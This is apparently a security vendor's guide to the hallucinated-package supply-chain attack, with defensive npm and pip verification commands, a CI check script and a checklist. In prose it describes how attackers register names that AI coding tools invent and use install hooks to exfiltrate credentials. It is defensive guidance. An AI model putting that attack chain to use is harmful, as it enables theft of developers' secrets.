The Attack Vector You Are Not Thinking About
AI coding tools hallucinate. When they hallucinate a function call, you get a runtime error. When they hallucinate a package name, you get a supply chain attack.
Here is how it works. You ask your AI coding tool to add PDF generation to your app. The tool suggests installing a package called pdf-render-utils. The name sounds plausible. The install command looks right. You run npm install pdf-render-utils.
Except pdf-render-utils does not exist. The AI hallucinated it. But an attacker who has been monitoring AI hallucination patterns registered that exact name on npm yesterday. The package you just installed contains code that exfiltrates your environment variables, including your database credentials and API keys, to a server controlled by the attacker.
This is not theoretical. Security researchers have documented this attack vector extensively. In a 2024 study, researchers found that AI coding tools hallucinate package names in approximately 5% of suggestions. Attackers are actively registering these phantom packages.
Verifying npm Packages
Before you install any package an AI tool suggests, verify it exists and is legitimate.
Step 1: Check if the Package Exists
# Check if a package exists on npm
npm view pdf-render-utils
# If the package does not exist, you will see:
# npm ERR! code E404
# npm ERR! 404 Not Found
# If it exists, you will see package metadata
Step 2: Check Download Counts and Age
# View package details including creation date
npm view pdf-render-utils time
# Check weekly downloads (use the npm website)
# https://www.npmjs.com/package/pdf-render-utils
# RED FLAGS:
# - Package created in the last 30 days
# - Fewer than 100 weekly downloads
# - No linked GitHub/GitLab repository
# - Author has no other published packages
Step 3: Inspect Before Installing
# Download the package without installing (inspect first)
npm pack pdf-render-utils
# This downloads a .tgz file you can extract and review
# Look for suspicious code in:
# - postinstall scripts (package.json "scripts" section)
# - index.js or main entry point
# - Any network calls (http, https, fetch, axios)
# Check if the package has install scripts
npm view pdf-render-utils scripts
postinstall scripts that execute immediately when you run npm install. By the time you see the package is suspicious, the malicious code has already run. Always verify before installing.
Verifying pip Packages (Python)
Step 1: Check if the Package Exists
# Check if a package exists on PyPI
pip index versions pdf-render-utils
# Or check the PyPI website directly
# https://pypi.org/project/pdf-render-utils/
# If the page returns 404, the package does not exist
# If the AI suggested it and it does not exist, the name was hallucinated
Step 2: Review Package Metadata
# Download without installing
pip download pdf-render-utils --no-deps -d ./review/
# Inspect the downloaded file
# For .whl files, rename to .zip and extract
# For .tar.gz files, extract normally
# Check setup.py or pyproject.toml for:
# - install_requires (unexpected dependencies)
# - cmdclass (custom install commands)
# - Any code that runs during installation
Step 3: Check the Package History
# Use pip-audit to check for known vulnerabilities
pip install pip-audit
pip-audit
# Check package creation date on PyPI
# Visit https://pypi.org/project/PACKAGE_NAME/#history
# Look at the release history
# RED FLAGS:
# - Only one release (version 0.1.0 or 1.0.0)
# - Published within the last 30 days
# - No source code repository linked
# - Description copied from a well-known package
# - Author email uses a free email provider
The Hallucinated Dependency Attack in Detail
Understanding the full attack chain helps you recognize the risk:
- Reconnaissance. Attackers use AI coding tools with common prompts and log every package name the AI suggests. They filter for names that return 404 on npm or PyPI.
- Registration. The attacker registers the hallucinated package name on the official registry. The package description mimics what the AI described it as. The code looks plausible at a glance.
- Payload. The package contains a postinstall script (npm) or setup.py hook (pip) that runs automatically during installation. The payload typically reads environment variables, searches for .env files and exfiltrates credentials to an attacker-controlled server.
- Waiting. The attacker waits. Every developer who uses the same AI tool and gets the same hallucinated suggestion will install the malicious package.
- Impact. The attacker gains access to database credentials, API keys, cloud provider tokens and any other secrets stored in environment variables. From there, they access production databases, cloud infrastructure and third-party services.
Automated Protection
Manual verification works but does not scale. Here are automated approaches for teams.
CI/CD Package Verification Gate
#!/bin/bash
# ci-verify-packages.sh
# Add to your CI/CD pipeline before npm install
echo "Verifying all packages in package.json..."
# Extract package names from package.json
PACKAGES=$(node -e "
const pkg = require('./package.json');
const deps = Object.keys(pkg.dependencies || {});
const devDeps = Object.keys(pkg.devDependencies || {});
console.log([...deps, ...devDeps].join('\n'));
")
FAILED=0
for PKG in $PACKAGES; do
if ! npm view "$PKG" name >/dev/null 2>&1; then
echo "ERROR: Package '$PKG' not found on npm registry"
FAILED=1
fi
done
if [ $FAILED -eq 1 ]; then
echo "Build blocked: unverifiable packages detected"
exit 1
fi
echo "All packages verified."
Use Lock Files and Integrity Hashes
# npm: always use package-lock.json
# The lock file includes integrity hashes for every package
npm ci # Use ci instead of install in CI/CD
# This enforces the lock file exactly
# Python: use pip with hash verification
pip install --require-hashes -r requirements.txt
# Generate requirements with hashes:
pip-compile --generate-hashes requirements.in
Quick Reference Checklist
Before installing any AI-suggested package:
- Run
npm view package-nameor checkpypi.org/project/package-name - Verify the package has been published for more than 30 days
- Check that weekly downloads are reasonable (not single digits)
- Confirm a linked source code repository exists
- Review the package for postinstall scripts
- Consider whether a well-known alternative exists for the same functionality
If the package fails any of these checks, do not install it. Ask your AI tool for an alternative and verify that one too.
For a comprehensive dependency security review as part of a full application audit, scope a vibe coding security audit starting at $1,500 CAD. For the full set of security prompts you can paste into your AI coding tool, visit our AI Security Prompt Library.